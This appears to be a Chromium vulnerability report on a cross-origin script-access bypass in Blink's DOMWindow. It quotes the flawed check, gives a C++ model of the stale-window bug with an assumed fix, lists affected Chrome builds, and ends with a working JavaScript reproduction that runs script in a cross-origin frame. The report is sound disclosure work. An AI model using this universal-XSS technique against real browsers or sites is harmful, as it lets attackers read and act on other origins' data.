#### VULNERABILITY DETAILS
From /WebKit/Source/core/frame/DOMWindow.cpp:
```
bool DOMWindow::isInsecureScriptAccess(LocalDOMWindow& callingWindow, const String& urlString)
{
    if (!protocolIsJavaScript(urlString))
        return false;

    // If this DOMWindow isn't currently active in the Frame, then there's no
    // way we should allow the access.
    if (isCurrentlyDisplayedInFrame()) {
        // FIXME: Is there some way to eliminate the need for a separate "callingWindow == this" check?
        if (&callingWindow == this)
            return false;

        // FIXME: The name canAccess seems to be a roundabout way to ask "can execute script".
        // Can we name the SecurityOrigin function better to make this more clear?
        if (callingWindow.frame()->securityContext()->securityOrigin()->canAccessCheckSuborigins(frame()->securityContext()->securityOrigin()))
            return false;
    }

    callingWindow.printErrorMessage(crossDomainAccessErrorMessage(&callingWindow));
    return true;
}
```
|callingWindow| may be a window that has already been unloaded, while its associated |frame()| now holds a different, potentially cross-origin document. Because the check reads the caller's origin from |callingWindow.frame()| (the frame's current document) rather than from the calling window's own document, the comparison is made against the wrong origin, and the security check can be bypassed.
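The following is an added, self-contained C++ model of the stale-window situation described above; it is not Blink code. It reduces Frame, Window and Document to a few pointers, mirrors the vulnerable origin lookup beside a hardened variant that compares the calling window's own document origin (an assumption for this example, not necessarily the patch Chromium shipped), and shows that only the hardened check denies the access once the frame has navigated cross-origin. The origins are constructed sample values.

```cpp
#include <string>

// Minimal model (not Blink's real classes): an origin is its serialized
// string, a Document has one origin, a Frame points at whatever Document
// and Window it currently displays, and a Window remembers the Frame it
// was created for plus the Document it belongs to.
struct Document { std::string origin; };
struct Frame;
struct Window { Frame* frame; Document* document; };
struct Frame { Document* currentDocument; Window* currentWindow; };

// Same-origin stand-in for SecurityOrigin::canAccess (no suborigin handling).
static bool canAccess(const std::string& a, const std::string& b) { return a == b; }

static bool isCurrentlyDisplayedInFrame(const Window& w) { return w.frame->currentWindow == &w; }

// Mirrors the vulnerable logic (javascript: URL check omitted): the caller's
// origin is read from the Frame's *current* document, which may no longer be
// the document the calling window belongs to.
bool isInsecureScriptAccessFrameOrigin(Window& calling, Window& target) {
    if (isCurrentlyDisplayedInFrame(target)) {
        if (&calling == &target) return false;
        if (canAccess(calling.frame->currentDocument->origin, target.frame->currentDocument->origin)) return false;
    }
    return true;  // blocked
}

// Hardened variant (assumed here): compare the origin of the calling window's own document.
bool isInsecureScriptAccessDocumentOrigin(Window& calling, Window& target) {
    if (isCurrentlyDisplayedInFrame(target)) {
        if (&calling == &target) return false;
        if (canAccess(calling.document->origin, target.frame->currentDocument->origin)) return false;
    }
    return true;  // blocked
}

// Scenario from the report: an iframe's initial window is retained after the
// frame navigates to a cross-origin document. Returns each check's verdict
// (true = access blocked).
struct Verdict { bool frameBased; bool documentBased; };
Verdict staleWindowScenario() {
    Document parentDoc{"https://parent.example"};      // constructed sample origin
    Document crossOriginDoc{"https://abc.xyz"};        // origin the frame navigates to
    Frame frame{&parentDoc, nullptr};
    Window stale{&frame, &parentDoc};  // initial about:blank window inherits the parent's origin
    frame.currentWindow = &stale;
    // Navigation installs a new document and window, but |stale| still points at |frame|.
    Window fresh{&frame, &crossOriginDoc};
    frame.currentDocument = &crossOriginDoc;
    frame.currentWindow = &fresh;
    return {isInsecureScriptAccessFrameOrigin(stale, fresh),
            isInsecureScriptAccessDocumentOrigin(stale, fresh)};
}
```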
#### VERSION
Chrome 44.0.2403.157 (Stable)
Chrome 45.0.2454.46 (Beta)
Chrome 46.0.2486.0 (Dev)
Chromium 47.0.2493.0 (Release build compiled today)
#### REPRODUCTION CASE
```
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
var f = frames[0].Function;
i.onload = function() {
f("location.replace('javascript:alert(location)')")();
}
i.src = 'https://abc.xyz';
</script>
```